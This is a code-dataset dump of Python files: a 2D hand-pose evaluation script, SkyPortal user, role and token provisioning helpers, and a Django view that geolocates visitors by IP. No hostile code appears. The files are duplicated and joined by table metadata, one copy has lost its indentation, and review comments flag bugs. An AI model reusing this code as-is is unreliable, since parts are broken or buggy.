                        help='run in distributed mode (read by main for Sync BatchNorm)')
    parser.add_argument('--is_vis',
                        default=0,
                        type=int)
    parser.add_argument('--batch_size',
                        default=32,
                        type=int)
    parser.add_argument('--model_path', default='', type=str)

    args = parser.parse_args()

    return args
def main():
    """Evaluate a 2D hand-pose model on the test split.

    Loads the model from --model_path, iterates the test loader, accumulates
    per-joint 2D pixel errors and PCK statistics over visible joints, and
    writes the results to ./eval_results/eval2D_results_<EXP_NAME>/.
    With --is_vis, previously saved results are loaded and plotted instead.
    """
    args = parse_args()
    update_config(cfg, args)
    cfg.defrost()
    cfg.freeze()

    file_path = './eval_results'
    if not os.path.exists(file_path):
        os.mkdir(file_path)
    record_prefix = os.path.join(file_path, 'eval2D_results_')

    if args.is_vis:
        # visualization-only mode: load previously saved metrics and plot them
        result_dir = record_prefix + cfg.EXP_NAME
        mse2d_lst = np.loadtxt(os.path.join(result_dir, 'mse2d_each_joint.txt'))
        PCK2d_lst = np.loadtxt(os.path.join(result_dir, 'PCK2d.txt'))
        plot_performance(PCK2d_lst[1,:], PCK2d_lst[0,:], mse2d_lst)
        exit()

    cudnn.benchmark = cfg.CUDNN.BENCHMARK
    torch.backends.cudnn.deterministic = cfg.CUDNN.DETERMINISTIC
    torch.backends.cudnn.enabled = cfg.CUDNN.ENABLED

    model_path = args.model_path
    is_vis = args.is_vis

    # FP16 SETTING
    if cfg.FP16.ENABLED:
        assert torch.backends.cudnn.enabled, "fp16 mode requires cudnn backend to be enabled."

    if cfg.FP16.STATIC_LOSS_SCALE != 1.0:
        if not cfg.FP16.ENABLED:
            print("Warning: if --fp16 is not used, static_loss_scale will be ignored.")

    # instantiate the model class named in the config (e.g. A2JPoseNet)
    model = eval(cfg.MODEL.NAME)(cfg)

    if cfg.FP16.ENABLED:
        model = network_to_half(model)

    if cfg.MODEL.SYNC_BN and not args.distributed:
        print('Warning: Sync BatchNorm is only supported in distributed training.')

    if args.gpu != -1:
        device = torch.device('cuda:'+str(args.gpu))
        torch.cuda.set_device(args.gpu)
    else:
        device = torch.device('cpu')

    # load model state
    if model_path:
        print("Loading model:", model_path)
        ckpt = torch.load(model_path, map_location='cpu')
        if 'state_dict' not in ckpt.keys():
            state_dict = ckpt
        else:
            state_dict = ckpt['state_dict']
            print('Model epoch {}'.format(ckpt['epoch']))
        # strip DataParallel's "module." prefix so keys match a bare model
        for key in list(state_dict.keys()):
            new_key = key.replace("module.", "")
            state_dict[new_key] = state_dict.pop(key)
        model.load_state_dict(state_dict, strict=True)

    model.to(device)
    model.eval()

    # inference_dataset = eval('dataset.{}'.format(cfg.DATASET.TEST_DATASET[0].replace('_kpt','')))(
    #     cfg.DATA_DIR,
    #     cfg.DATASET.TEST_SET,
    #     transform=transform
    # )
    inference_dataset = eval('dataset.{}'.format(cfg.DATASET.DATASET_NAME))(
        cfg,
        transforms=trans,
        mode='test'
    )

    batch_size = args.batch_size
    if platform.system() == 'Linux':
        main_workers = min(8, batch_size)
    else:
        # non-Linux (debug) setup: tiny batches, no worker processes
        batch_size = 4
        main_workers = 0

    data_loader = torch.utils.data.DataLoader(
        inference_dataset,
        batch_size=batch_size, #48
        shuffle=False,
        num_workers=main_workers, #8
        pin_memory=False
    )

    print('\nEvaluation loader information:\n' + str(data_loader.dataset))

    n_joints = cfg.DATASET.NUM_JOINTS
    # PCK thresholds in pixels: 1..49
    th2d_lst = np.array([i for i in range(1,50)])
    PCK2d_lst = np.zeros((len(th2d_lst),))
    # two hands
    mse2d_lst = np.zeros((2*n_joints,))
    visibility_lst = np.zeros((2*n_joints,))

    print('Start evaluating... [Batch size: {}]\n'.format(data_loader.batch_size))
    with torch.no_grad():
        pose2d_mse_loss = JointsMSELoss().to(device)
        infer_time = [0,0]
        start_time = time.time()
        for i, ret in enumerate(data_loader):
            # imgs: b x 3 x H x W
            # pose2d_gt: b x 42 x 3 [u,v,z]
            # hand_type: b x 2 ([1,0] for right, [0,1] for left and [1,1] for interacting hands)
            # pose_valid: b x 42
            # NOTE(review): .cuda(...) will fail when device is CPU (args.gpu == -1) -- confirm
            imgs, pose2d_gt = ret['imgs'].cuda(device, non_blocking=True), ret['pose2d_gt']
            hand_type, pose_valid = ret['hand_type'], ret['joint_valid'].numpy()
            s1 = time.time()
            batch_size = imgs.shape[0]
            # cls: b x w*h*n_anchors x 42
            # pose_pred: B x 42 x 2
            # reg: B x w*h*n_anchors x 42 x 2
            pose2d_pred, surrounding_anchors_pred, cls_pred, reg, temperature = model(imgs)

            # skip the first batches when timing so warm-up is excluded
            if i+1 >= min(len(data_loader), 20):
                infer_time[0] += 1
                infer_time[1] += time.time() - s1

            # rescale to the original image before DLT
            # for k in range(21):
            #     print(pose2d_gt[0,k].tolist(), pose2d_pred[0,k].tolist())
            # input()
            # 2D errors
            # import matplotlib.pyplot as plt
            # imgs = cv2.resize(imgs[0].permute(1,2,0).cpu().numpy(), tuple(data_loader.dataset.orig_img_size))
            # for k in range(21):
            #     print(pose2d_gt[0,k],pose2d_pred[0,k],visibility[0,k])
            # for k in range(0,21,5):
            #     fig = plt.figure()
            #     ax1 = fig.add_subplot(131)
            #     ax2 = fig.add_subplot(132)
            #     ax3 = fig.add_subplot(133)
            #     ax1.imshow(cv2.cvtColor(imgs / imgs.max(), cv2.COLOR_BGR2RGB))
            #     plot_hand(ax1, pose2d_gt[0,:,0:2], order='uv')
            #     ax2.imshow(cv2.cvtColor(imgs / imgs.max(), cv2.COLOR_BGR2RGB))
            #     plot_hand(ax2, pose2d_pred[0,:,0:2], order='uv')
            #     ax3.imshow(heatmaps_pred[0,k].cpu().numpy())
            #     plt.show()
            # per-joint Euclidean pixel error, masked by joint validity
            mse_each_joint = np.linalg.norm(pose2d_pred[:,:,0:2].cpu().numpy() - pose2d_gt[:,:,0:2].numpy(), axis=2) * pose_valid # b x 42
            mse2d_lst += mse_each_joint.sum(axis=0)
            visibility_lst += pose_valid.sum(axis=0)

            for th_idx in range(len(th2d_lst)):
                PCK2d_lst[th_idx] += np.sum((mse_each_joint < th2d_lst[th_idx]) * pose_valid)

            period = min(len(data_loader), 10)
            if i % (len(data_loader)//period) == 0:
                print("[Evaluation]{}% finished.".format(period * i // (len(data_loader)//period)))
            #if i == 10:break
        print('Evaluation spent {:.2f} s\tfps: {:.1f} {:.4f}'.format(time.time()-start_time, infer_time[0]/infer_time[1], infer_time[1]/infer_time[0]))

        # normalize by the number of visible joints
        mse2d_lst /= visibility_lst
        PCK2d_lst /= visibility_lst.sum()

        result_dir = record_prefix+cfg.EXP_NAME
        if not os.path.exists(result_dir):
            os.mkdir(result_dir)

        mse_file, pck_file = os.path.join(result_dir, 'mse2d_each_joint.txt'), os.path.join(result_dir, 'PCK2d.txt')
        print('Saving results to ' + mse_file)
        print('Saving results to ' + pck_file)
        np.savetxt(mse_file, mse2d_lst, fmt='%.4f')
        np.savetxt(pck_file, np.stack((th2d_lst, PCK2d_lst)))
    plot_performance(PCK2d_lst, th2d_lst, mse2d_lst, hand_type='interacting')
main() | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import platform
import numpy as np
import time
import os
import torch
import torch.backends.cudnn as cudnn
import _init_paths
from config import cfg
from config import update_config
from utils.utils import get_model_summary
from ptflops import get_model_complexity_info
from fp16_utils.fp16util import network_to_half
from core.loss import BoneLengthLoss, JointAngleLoss, JointsMSELoss
import dataset
from dataset.build import trans
from models import A2JPoseNet
from utils.misc import plot_performance
import matplotlib
if platform.system() == 'Linux':
matplotlib.use('Agg')
else:
matplotlib.use('Tkagg')
# python evaluate_2D.py --cfg ../experiments/InterHand/exp_test.yaml --model_path ../output/InterHand/exp_test/model_best.pth.tar --gpu 3 --batch_size 32
def parse_args():
parser = argparse.ArgumentParser(description='Please specify the mode [training/assessment/predicting]')
parser.add_argument('--cfg',
help='experiment configure file name',
required=True,
type=str)
parser.add_argument('opts',
help="Modify cfg options using the command-line",
default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--gpu',
help='gpu id for multiprocessing training',
default=-1,
type=int)
parser.add_argument('--world-size',
default=1,
type=int,
help='number of nodes for distributed training')
parser.add_argument('--is_vis',
default=0,
type=int)
parser.add_argument('--batch_size',
default=32,
type=int)
parser.add_argument('--model_path', default='', type=str)
args = parser.parse_args()
return args
def main():
    """Evaluate a 2-D hand-pose model: compute per-joint MSE and PCK curves
    over the test set and write/plot the results under ./eval_results."""
    args = parse_args()
    update_config(cfg, args)
    cfg.defrost()
    cfg.freeze()
    file_path = './eval_results'
    if not os.path.exists(file_path):
        os.mkdir(file_path)
    record_prefix = os.path.join(file_path, 'eval2D_results_')
    if args.is_vis:
        # Visualization-only mode: load previously saved metrics and plot.
        result_dir = record_prefix + cfg.EXP_NAME
        mse2d_lst = np.loadtxt(os.path.join(result_dir, 'mse2d_each_joint.txt'))
        PCK2d_lst = np.loadtxt(os.path.join(result_dir, 'PCK2d.txt'))
        # Saved PCK file stacks (thresholds, PCK values); row 1 = PCK, row 0 = thresholds.
        plot_performance(PCK2d_lst[1,:], PCK2d_lst[0,:], mse2d_lst)
        exit()
    cudnn.benchmark = cfg.CUDNN.BENCHMARK
    torch.backends.cudnn.deterministic = cfg.CUDNN.DETERMINISTIC
    torch.backends.cudnn.enabled = cfg.CUDNN.ENABLED
    model_path = args.model_path
    is_vis = args.is_vis
    # FP16 SETTING
    if cfg.FP16.ENABLED:
        assert torch.backends.cudnn.enabled, "fp16 mode requires cudnn backend to be enabled."
    if cfg.FP16.STATIC_LOSS_SCALE != 1.0:
        if not cfg.FP16.ENABLED:
            print("Warning: if --fp16 is not used, static_loss_scale will be ignored.")
    # NOTE: eval() instantiates the model class named in the (trusted) config.
    model = eval(cfg.MODEL.NAME)(cfg)
    if cfg.FP16.ENABLED:
        model = network_to_half(model)
    # NOTE(review): parse_args() never defines ``distributed``; this branch
    # raises AttributeError when cfg.MODEL.SYNC_BN is set -- confirm/fix.
    if cfg.MODEL.SYNC_BN and not args.distributed:
        print('Warning: Sync BatchNorm is only supported in distributed training.')
    if args.gpu != -1:
        device = torch.device('cuda:'+str(args.gpu))
        torch.cuda.set_device(args.gpu)
    else:
        device = torch.device('cpu')
    # load model state
    if model_path:
        print("Loading model:", model_path)
        ckpt = torch.load(model_path, map_location='cpu')
        if 'state_dict' not in ckpt.keys():
            state_dict = ckpt
        else:
            state_dict = ckpt['state_dict']
            print('Model epoch {}'.format(ckpt['epoch']))
        # Strip DataParallel's "module." prefix so keys match a bare model.
        for key in list(state_dict.keys()):
            new_key = key.replace("module.", "")
            state_dict[new_key] = state_dict.pop(key)
        model.load_state_dict(state_dict, strict=True)
    model.to(device)
    model.eval()
    # inference_dataset = eval('dataset.{}'.format(cfg.DATASET.TEST_DATASET[0].replace('_kpt','')))(
    #     cfg.DATA_DIR,
    #     cfg.DATASET.TEST_SET,
    #     transform=transform
    # )
    inference_dataset = eval('dataset.{}'.format(cfg.DATASET.DATASET_NAME))(
        cfg,
        transforms=trans,
        mode='test'
    )
    batch_size = args.batch_size
    if platform.system() == 'Linux':
        main_workers = min(8, batch_size)
    else:
        # Non-Linux (e.g. Windows) fallback: small batch, no worker processes.
        batch_size = 4
        main_workers = 0
    data_loader = torch.utils.data.DataLoader(
        inference_dataset,
        batch_size=batch_size, #48
        shuffle=False,
        num_workers=main_workers, #8
        pin_memory=False
    )
    print('\nEvaluation loader information:\n' + str(data_loader.dataset))
    n_joints = cfg.DATASET.NUM_JOINTS
    # PCK thresholds in pixels: 1..49.
    th2d_lst = np.array([i for i in range(1,50)])
    PCK2d_lst = np.zeros((len(th2d_lst),))
    # two hands
    mse2d_lst = np.zeros((2*n_joints,))
    visibility_lst = np.zeros((2*n_joints,))
    print('Start evaluating... [Batch size: {}]\n'.format(data_loader.batch_size))
    with torch.no_grad():
        pose2d_mse_loss = JointsMSELoss().to(device)  # NOTE(review): created but unused below
        infer_time = [0,0]  # [num timed batches, accumulated seconds]
        start_time = time.time()
        for i, ret in enumerate(data_loader):
            # imgs: b x 3 x H x W
            # pose2d_gt: b x 42 x 3 [u,v,z]
            # hand_type: b x 2 ([1,0] for right, [0,1] for left and [1,1] for interacting hands)
            # pose_valid: b x 42
            # NOTE(review): .cuda(device, ...) will fail when device is the CPU.
            imgs, pose2d_gt = ret['imgs'].cuda(device, non_blocking=True), ret['pose2d_gt']
            hand_type, pose_valid = ret['hand_type'], ret['joint_valid'].numpy()
            s1 = time.time()
            batch_size = imgs.shape[0]
            # cls: b x w*h*n_anchors x 42
            # pose_pred: B x 42 x 2
            # reg: B x w*h*n_anchors x 42 x 2
            pose2d_pred, surrounding_anchors_pred, cls_pred, reg, temperature = model(imgs)
            # Only time the later batches so warm-up does not skew the fps figure.
            if i+1 >= min(len(data_loader), 20):
                infer_time[0] += 1
                infer_time[1] += time.time() - s1
            # rescale to the original image before DLT
            # for k in range(21):
            #     print(pose2d_gt[0,k].tolist(), pose2d_pred[0,k].tolist())
            # input()
            # 2D errors
            # import matplotlib.pyplot as plt
            # imgs = cv2.resize(imgs[0].permute(1,2,0).cpu().numpy(), tuple(data_loader.dataset.orig_img_size))
            # for k in range(21):
            #     print(pose2d_gt[0,k],pose2d_pred[0,k],visibility[0,k])
            # for k in range(0,21,5):
            #     fig = plt.figure()
            #     ax1 = fig.add_subplot(131)
            #     ax2 = fig.add_subplot(132)
            #     ax3 = fig.add_subplot(133)
            #     ax1.imshow(cv2.cvtColor(imgs / imgs.max(), cv2.COLOR_BGR2RGB))
            #     plot_hand(ax1, pose2d_gt[0,:,0:2], order='uv')
            #     ax2.imshow(cv2.cvtColor(imgs / imgs.max(), cv2.COLOR_BGR2RGB))
            #     plot_hand(ax2, pose2d_pred[0,:,0:2], order='uv')
            #     ax3.imshow(heatmaps_pred[0,k].cpu().numpy())
            #     plt.show()
            # Per-joint Euclidean pixel error, masked by joint validity.
            mse_each_joint = np.linalg.norm(pose2d_pred[:,:,0:2].cpu().numpy() - pose2d_gt[:,:,0:2].numpy(), axis=2) * pose_valid # b x 42
            mse2d_lst += mse_each_joint.sum(axis=0)
            visibility_lst += pose_valid.sum(axis=0)
            for th_idx in range(len(th2d_lst)):
                PCK2d_lst[th_idx] += np.sum((mse_each_joint < th2d_lst[th_idx]) * pose_valid)
            period = min(len(data_loader), 10)
            if i % (len(data_loader)//period) == 0:
                print("[Evaluation]{}% finished.".format(period * i // (len(data_loader)//period)))
            #if i == 10:break
        print('Evaluation spent {:.2f} s\tfps: {:.1f} {:.4f}'.format(time.time()-start_time, infer_time[0]/infer_time[1], infer_time[1]/infer_time[0]))
        # Normalize accumulated sums into per-joint means / overall PCK.
        mse2d_lst /= visibility_lst
        PCK2d_lst /= visibility_lst.sum()
        result_dir = record_prefix+cfg.EXP_NAME
        if not os.path.exists(result_dir):
            os.mkdir(result_dir)
        mse_file, pck_file = os.path.join(result_dir, 'mse2d_each_joint.txt'), os.path.join(result_dir, 'PCK2d.txt')
        print('Saving results to ' + mse_file)
        print('Saving results to ' + pck_file)
        np.savetxt(mse_file, mse2d_lst, fmt='%.4f')
        np.savetxt(pck_file, np.stack((th2d_lst, PCK2d_lst)))
        plot_performance(PCK2d_lst, th2d_lst, mse2d_lst, hand_type='interacting')
main() | en | 0.137781 | 1.799983 | 2 |
skyportal/model_util.py | jadalilleboe/skyportal | 1 | 13550 | from social_tornado.models import TornadoStorage
from skyportal.models import DBSession, ACL, Role, User, Token, Group
from skyportal.enum_types import LISTENER_CLASSES, sqla_enum_types
from baselayer.app.env import load_env
all_acl_ids = [
'Become user',
'Comment',
'Annotate',
'Manage users',
'Manage sources',
'Manage groups',
'Manage shifts',
'Manage allocations',
'Manage observing runs',
'Upload data',
'System admin',
'Post taxonomy',
'Delete taxonomy',
'Classify',
] + [c.get_acl_id() for c in LISTENER_CLASSES]
role_acls = {
'Super admin': all_acl_ids,
'Group admin': [
'Annotate',
'Comment',
'Manage shifts',
'Manage sources',
'Upload data',
'Post taxonomy',
'Manage users',
'Classify',
'Manage observing runs',
],
'Full user': [
'Annotate',
'Comment',
'Upload data',
'Classify',
'Manage observing runs',
],
'View only': [],
}
env, cfg = load_env()
def add_user(username, roles=None, auth=False, first_name=None, last_name=None):
    """Fetch or create the user *username* and ensure its memberships.

    Grants each role in *roles*, optionally creates a google-oauth2
    social-auth record for a new user, and adds the user to the sitewide
    public group (creating the group on first use).

    Returns the freshly re-queried ``User`` instance.
    """
    # Idiom fix: the original signature used a mutable default (roles=[]).
    if roles is None:
        roles = []
    user = User.query.filter(User.username == username).first()
    if user is None:
        user = User(username=username, first_name=first_name, last_name=last_name)
        if auth:
            TornadoStorage.user.create_social_auth(user, user.username, 'google-oauth2')
    for rolename in roles:
        role = Role.query.get(rolename)
        if role not in user.roles:
            user.roles.append(role)
    DBSession().add(user)
    DBSession().flush()
    # Add user to sitewide public group
    public_group = Group.query.filter(
        Group.name == cfg["misc"]["public_group_name"]
    ).first()
    if public_group is None:
        public_group = Group(name=cfg["misc"]["public_group_name"])
        DBSession().add(public_group)
        DBSession().flush()
    user.groups.append(public_group)
    DBSession().commit()
    return User.query.filter(User.username == username).first()
def refresh_enums():
    """Add any enum members missing from the corresponding database types."""
    session = DBSession()
    for enum_type in sqla_enum_types:
        for member in enum_type.enums:
            session.execute(
                f"ALTER TYPE {enum_type.name} ADD VALUE IF NOT EXISTS '{member}'"
            )
    session.commit()
def make_super_user(username):
    """Initializes a super user with full permissions.

    ``username`` is also used to create a google-oauth2 social-auth record.
    """
    setup_permissions()  # make sure permissions already exist
    add_user(username, roles=['Super admin'], auth=True)
def provision_token():
    """Provision an initial administrative token.

    Ensures the ``provisioned_admin`` super-user exists and returns an
    admin token carrying every ACL, creating it only on the first call
    (the token name acts as the idempotency key).
    """
    admin = add_user(
        'provisioned_admin',
        roles=['Super admin'],
        first_name="provisioned",
        last_name="admin",
    )
    # NOTE(review): the literal '<PASSWORD>' looks like a redaction artifact
    # from data cleaning -- confirm the intended token name.
    token_name = 'Initial <PASSWORD> token'
    token = (
        Token.query.filter(Token.created_by == admin).filter(Token.name == token_name)
    ).first()
    if token is None:
        token_id = create_token(all_acl_ids, user_id=admin.id, name=token_name)
        token = Token.query.get(token_id)
    return token
def provision_public_group():
    """If public group name is set in the config file, create it."""
    _, config = load_env()
    name = config['misc.public_group_name']
    if not name:
        return
    existing = Group.query.filter(Group.name == name).first()
    if existing is None:
        DBSession().add(Group(name=name))
        DBSession().commit()
def setup_permissions():
    """Create default ACLs/Roles needed by application.
    If a given ACL or Role already exists, it will be skipped."""
    # Ensure a row exists for every known ACL id.
    all_acls = [ACL.create_or_get(a) for a in all_acl_ids]
    DBSession().add_all(all_acls)
    DBSession().commit()
    # (Re)build each role's ACL list from the ``role_acls`` mapping.
    for r, acl_ids in role_acls.items():
        role = Role.create_or_get(r)
        role.acls = [ACL.query.get(a) for a in acl_ids]
        DBSession().add(role)
        DBSession().commit()
def create_token(ACLs, user_id, name):
    """Create a personal access token for *user_id* with the given ACLs.

    Returns the new token's id.
    """
    t = Token(permissions=ACLs, name=name)
    u = User.query.get(user_id)
    u.tokens.append(t)
    t.created_by = u
    DBSession().add(u)
    DBSession().add(t)
    DBSession().commit()
    return t.id
def delete_token(token_id):
    """Delete the token with the given id, if it exists.

    Cleanup: the original fetched the token and then issued a second,
    redundant existence query before deleting; one lookup suffices.
    """
    t = Token.query.get(token_id)
    if t is not None:
        DBSession().delete(t)
        DBSession().commit()
| from social_tornado.models import TornadoStorage
from skyportal.models import DBSession, ACL, Role, User, Token, Group
from skyportal.enum_types import LISTENER_CLASSES, sqla_enum_types
from baselayer.app.env import load_env
all_acl_ids = [
'Become user',
'Comment',
'Annotate',
'Manage users',
'Manage sources',
'Manage groups',
'Manage shifts',
'Manage allocations',
'Manage observing runs',
'Upload data',
'System admin',
'Post taxonomy',
'Delete taxonomy',
'Classify',
] + [c.get_acl_id() for c in LISTENER_CLASSES]
role_acls = {
'Super admin': all_acl_ids,
'Group admin': [
'Annotate',
'Comment',
'Manage shifts',
'Manage sources',
'Upload data',
'Post taxonomy',
'Manage users',
'Classify',
'Manage observing runs',
],
'Full user': [
'Annotate',
'Comment',
'Upload data',
'Classify',
'Manage observing runs',
],
'View only': [],
}
env, cfg = load_env()
def add_user(username, roles=None, auth=False, first_name=None, last_name=None):
    """Fetch or create the user *username* and ensure its memberships.

    Grants each role in *roles*, optionally creates a google-oauth2
    social-auth record for a new user, and adds the user to the sitewide
    public group (creating the group on first use).

    Returns the freshly re-queried ``User`` instance.
    """
    # Idiom fix: the original signature used a mutable default (roles=[]).
    if roles is None:
        roles = []
    user = User.query.filter(User.username == username).first()
    if user is None:
        user = User(username=username, first_name=first_name, last_name=last_name)
        if auth:
            TornadoStorage.user.create_social_auth(user, user.username, 'google-oauth2')
    for rolename in roles:
        role = Role.query.get(rolename)
        if role not in user.roles:
            user.roles.append(role)
    DBSession().add(user)
    DBSession().flush()
    # Add user to sitewide public group
    public_group = Group.query.filter(
        Group.name == cfg["misc"]["public_group_name"]
    ).first()
    if public_group is None:
        public_group = Group(name=cfg["misc"]["public_group_name"])
        DBSession().add(public_group)
        DBSession().flush()
    user.groups.append(public_group)
    DBSession().commit()
    return User.query.filter(User.username == username).first()
def refresh_enums():
    """Add any enum members missing from the corresponding database types."""
    session = DBSession()
    for enum_type in sqla_enum_types:
        for member in enum_type.enums:
            session.execute(
                f"ALTER TYPE {enum_type.name} ADD VALUE IF NOT EXISTS '{member}'"
            )
    session.commit()
def make_super_user(username):
    """Initializes a super user with full permissions.

    ``username`` is also used to create a google-oauth2 social-auth record.
    """
    setup_permissions()  # make sure permissions already exist
    add_user(username, roles=['Super admin'], auth=True)
def provision_token():
    """Provision an initial administrative token.

    Ensures the ``provisioned_admin`` super-user exists and returns an
    admin token carrying every ACL, creating it only on the first call
    (the token name acts as the idempotency key).
    """
    admin = add_user(
        'provisioned_admin',
        roles=['Super admin'],
        first_name="provisioned",
        last_name="admin",
    )
    # NOTE(review): the literal '<PASSWORD>' looks like a redaction artifact
    # from data cleaning -- confirm the intended token name.
    token_name = 'Initial <PASSWORD> token'
    token = (
        Token.query.filter(Token.created_by == admin).filter(Token.name == token_name)
    ).first()
    if token is None:
        token_id = create_token(all_acl_ids, user_id=admin.id, name=token_name)
        token = Token.query.get(token_id)
    return token
def provision_public_group():
    """If public group name is set in the config file, create it."""
    _, config = load_env()
    name = config['misc.public_group_name']
    if not name:
        return
    existing = Group.query.filter(Group.name == name).first()
    if existing is None:
        DBSession().add(Group(name=name))
        DBSession().commit()
def setup_permissions():
    """Create default ACLs/Roles needed by application.
    If a given ACL or Role already exists, it will be skipped."""
    # Ensure a row exists for every known ACL id.
    all_acls = [ACL.create_or_get(a) for a in all_acl_ids]
    DBSession().add_all(all_acls)
    DBSession().commit()
    # (Re)build each role's ACL list from the ``role_acls`` mapping.
    for r, acl_ids in role_acls.items():
        role = Role.create_or_get(r)
        role.acls = [ACL.query.get(a) for a in acl_ids]
        DBSession().add(role)
        DBSession().commit()
def create_token(ACLs, user_id, name):
    """Create a personal access token for *user_id* with the given ACLs.

    Returns the new token's id.
    """
    t = Token(permissions=ACLs, name=name)
    u = User.query.get(user_id)
    u.tokens.append(t)
    t.created_by = u
    DBSession().add(u)
    DBSession().add(t)
    DBSession().commit()
    return t.id
def delete_token(token_id):
    """Delete the token with the given id, if it exists.

    Cleanup: the original fetched the token and then issued a second,
    redundant existence query before deleting; one lookup suffices.
    """
    t = Token.query.get(token_id)
    if t is not None:
        DBSession().delete(t)
        DBSession().commit()
| pt | 0.139462 | 2.07689 | 2 |
pages/views.py | SmartDataWithR/CovidHelper | 0 | 13551 | <filename>pages/views.py
from django.views.generic import TemplateView
from ipware import get_client_ip
from django.shortcuts import render, redirect
from django.contrib import messages
from django.contrib.auth.forms import PasswordChangeForm
from django.contrib.auth import update_session_auth_hash
from django.conf import settings
from .forms import SearchForm
from users.models import CustomUser
import geopy
from geopy.distance import geodesic
import pandas as pd
import json
from django.utils.translation import gettext as _, activate
# required for IP to numeric
import socket
import struct
# import file for ip's to language mapping
df_ip_lang = pd.read_csv('pages/lng_map.csv', names=['ip_from', 'ip_to', 'country_code', 'country_name', 'lang_code'] )
def ip(request):
    """Return ``(address, visibility)`` for the requesting client.

    ``visibility`` is "Public" for a routable address, "Private" otherwise.

    Bug fix: when no client IP could be determined, the original left
    ``ipv`` unassigned and the return statement raised ``NameError``.
    """
    addr, is_routable = get_client_ip(request)
    if addr is None:
        # Unknown client: report the all-zeros address as private.
        return ("0.0.0.0", "Private")
    ipv = "Public" if is_routable else "Private"
    return (addr, ipv)
def ip2int(addr):
    """Convert a dotted-quad IPv4 string to its unsigned integer value."""
    packed = socket.inet_aton(addr)
    return int.from_bytes(packed, "big")
def index(request):
    """Render the home page, activating a UI language inferred from the
    client IP (or URL path) and, when a search was POSTed, attaching
    nearby matching users to the template context.

    POST data used: 'search-field' (location text) and 'search-catogery'
    (group id as string; '4' means all groups).
    """
    search = request.POST.get('search-field')
    searchCat = request.POST.get('search-catogery')
    locator = geopy.Nominatim(user_agent="myGeocoder")
    gotodiv = False

    # ---- Map the client IP to a UI language -------------------------
    request_ip = ip(request)                # (address, visibility)
    request_ip_int = ip2int(request_ip[0])  # numeric form for range lookup
    df_filt = df_ip_lang[df_ip_lang.ip_from <= request_ip_int]
    range_to_check = df_filt.iloc[-1]
    # Bug fix: the original wrote ``a > b & c < d``; ``&`` binds tighter
    # than the comparisons, so it computed a bitwise AND instead of the
    # intended "ip lies inside [ip_from, ip_to]" check.
    is_in_range = (request_ip_int > range_to_check.ip_from
                   and request_ip_int < range_to_check.ip_to)
    country_code = 'en-us'  # default language
    if is_in_range:
        country_code = range_to_check.lang_code
    activate(country_code)

    # A language selected manually via the URL path overrides the IP guess.
    current_path = str(request.get_full_path()).strip('/')
    print(current_path)
    if current_path == 'en':
        activate('en-us')
    elif current_path != '':
        activate(current_path)

    context = {}
    if search != None:
        location = locator.geocode(search, timeout=5)
        if not hasattr(location, 'longitude'):
            # Geocoding failed: fall back to a default city.
            location = locator.geocode('Hamburg', timeout=5)
        # Security fix: ``searchCat`` comes straight from POST data; the
        # original concatenated it into the SQL string (SQL injection).
        # Use a parameterized raw query instead.
        if searchCat == '4':  # '4' means "all categories"
            raw_sql = 'SELECT * FROM users_customuser'
            params = []
        else:
            raw_sql = 'SELECT * FROM users_customuser WHERE group_membership like %s'
            params = [searchCat]
        print(raw_sql)
        df = pd.DataFrame(
            [u.id, u.group_membership, u.longitude, u.latitude, u.slogan,
             u.zip_code, u.description, u.map_show_location, u.username,
             u.help_type, u.userImg_Url, u.shop_type]
            for u in CustomUser.objects.raw(raw_sql, params)
        )
        df.columns = ['id', 'group_membership', 'longitude', 'latitude',
                      'slogan', 'zip_code', 'description', 'map_show_location',
                      'username', 'help_type', 'userImg_Url', 'shop_type']
        # NOTE(review): geopy's ``geodesic`` expects (latitude, longitude)
        # pairs; (longitude, latitude) is passed here for both points.
        # Kept as-is to preserve behavior -- confirm and fix separately.
        df['distance'] = [
            geodesic((location.longitude, location.latitude), (x, y)).miles
            for x, y in zip(df['longitude'], df['latitude'])
        ]
        # filter for distance max 20km (12.4 miles)
        df_filt = df[df['distance'] < 12.4]
        print(df_filt)
        # Flatten the columns into plain lists for the template.
        group_membership = [int(x) for x in df_filt['group_membership'].values.tolist()]
        help_type = df_filt['help_type'].values.tolist()
        userImg_Url = df_filt['userImg_Url'].values.tolist()
        slogan = df_filt['slogan'].values.tolist()
        shop_type = df_filt['shop_type'].values.tolist()  # currently unused by the template
        description = df_filt['description'].values.tolist()
        username = df_filt['username'].values.tolist()
        zipcode = df_filt['zip_code'].values.tolist()
        longitudes = df_filt['longitude'].values.tolist()
        latitudes = df_filt['latitude'].values.tolist()
        ids = df_filt['id'].values.tolist()
        map_show_location = [int(x) for x in df_filt['map_show_location'].values.tolist()]
        rname = list(range(0, len(ids)))
        template_table = list(zip(rname, ids, slogan, description, zipcode))
        gotodiv = 'search'
        context = {'longitude': location.longitude, 'latitude': location.latitude,
                   'id': ids, 'userImg_Url': userImg_Url,
                   'group_membership': group_membership, 'longitudes': longitudes,
                   'latitudes': latitudes, 'slogan': slogan,
                   'description': description, 'gotodiv': gotodiv,
                   'map_show_location': map_show_location,
                   'template_table': template_table, 'username': username,
                   'help_type': help_type}
    return render(request, 'pages/home.html', context)
class HomePageView(TemplateView):
    # Static landing page rendered via Django's generic TemplateView.
    template_name = 'pages/home.html'

class AboutPageView(TemplateView):
    # Static "about" page.
    template_name = 'pages/about.html'
def searchLocation(request):
    """Render the home page with a ``SearchForm`` (bound to POST data on POST)."""
    # NOTE(review): passing ``request`` itself as the first argument makes it
    # act as the form's *data*; normally an unbound form is ``SearchForm()``
    # -- confirm the intended constructor arguments.
    form = SearchForm(request)
    print(form)
    if request.method=='POST':
        form = SearchForm(request.POST)
    return render(request, 'pages/home.html', {'form': form})
def change_password(request):
    """Handle the password-change form: GET shows it, valid POST applies it."""
    if request.method == 'POST':
        form = PasswordChangeForm(request.user, request.POST)
        if form.is_valid():
            user = form.save()
            # Keep the user logged in after the password change.
            update_session_auth_hash(request, user)  # Important!
            messages.success(request, 'Your password was successfully updated!')
            return redirect('change_password')
        else:
            messages.error(request, 'Please correct the error below.')
    else:
        form = PasswordChangeForm(request.user)
    return render(request, 'account/password_set.html', {
        'form': form
    })
def privacy(request):
    """Render the static privacy-policy page."""
    return render(request, 'pages/privacy.html')

def imprint(request):
    """Render the static imprint page."""
    return render(request, 'pages/imprint.html')

def terms(request):
    """Render the static terms-and-conditions page."""
    return render(request, 'pages/terms_conditions.html')

def cookie_policy(request):
    """Render the static cookie-policy page."""
    return render(request, 'pages/cookie_policy.html')
| <filename>pages/views.py
from django.views.generic import TemplateView
